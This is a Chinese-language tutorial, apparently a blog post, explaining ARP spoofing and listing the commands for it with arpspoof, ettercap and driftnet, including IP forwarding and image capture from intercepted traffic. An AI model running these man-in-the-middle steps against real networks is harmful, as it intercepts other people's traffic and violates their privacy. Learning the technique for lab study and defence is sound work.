ARP欺骗攻击

ARP欺骗攻击

• 什么是ARP欺骗攻击

  ​ **ARP（Address Resolution Protocol）是地址解析协议，是一种将IP地址转化成物理地址的协议。ARP具体说来就是将网络层（也就是相当于OSI的第三层）地址解析为数据链路层（也就是相当于OSI的第二层）**的物理地址（注：此处物理地址并不一定指MAC地址）。

  ​ **ARP缓存**是个用来储存IP地址和MAC地址的缓存区，其本质就是一个IP地址 --> MAC地址的对应表，表中每一个条目分别记录了网络上其它主机的IP地址和对应的MAC地址。

  ​ 由于局域网的网络流通不是根据IP地址进行，而是根据MAC地址进行传输。所以，MAC地址的伪造，将数据转发的流向进行错误导向，即称为ARP欺骗攻击。这是对ARP协议建立在信任机制上的利用。
  

• 使用arpspoof进行ARP欺骗攻击

  ​ 网关192.168.0.1 目标192.168.0.205 本机192.168.0.203

  典型步骤：

  1：开启本地攻击机数据转发功能，将功能参数置于1 (0为不转发)，不开启即不响应，丢包
  	echo 1 >> /proc/sys/net/ipv4/ip_forward		修改后用cat命令检查一下
  2：正向欺骗
  	arpspoof -i eth0 -t 192.168.0.205 192.168.0.1
  3：反向欺骗
  	arpspoof -i eth0 -t 192.168.0.1 192.168.0.205
  1
  2
  3
  4
  5
  6

  ​ 可以用WireShark抓包观察攻击效果

• 使用ettercap进行ARP欺骗攻击

  ​ 网关192.168.0.1 目标192.168.0.205 本机192.168.0.203

  ettercap典型参数：	ettercap -G 开启图形界面
  -t	只监听这种协议
  -T ettercap	检查pcap文件(脱机监听)
  -q	安静(不回显)
  -M	这是一个重要的参数，他会告诉ettercap执行中间人攻击，如 -M method
  1
  2
  3
  4
  5

  典型步骤：

  1：ettercap -G 开启图形界面，选择sniff--unified sniffing --选网卡
  2：Hosts ---- 扫描并列出主机
  3：目标添加target 1，网关添加target2
  4：Mitm中间人攻击 ---- ARP ---- 勾选嗅探远程连接
  5：start ---- start sniffing
  1
  2
  3
  4
  5

  ​ 可以用WireShark观察攻击效果</u>

• 使用driftnet配合ARP攻击进行数据截取

  典型步骤：

  1：开启ARP攻击
  2：使用命令 driftnet -i eth0
  3：截取流量中的图片内容
  1
  2
  3

：开启ARP攻击
2：使用命令 driftnet -i eth0
3：截取流量中的图片内容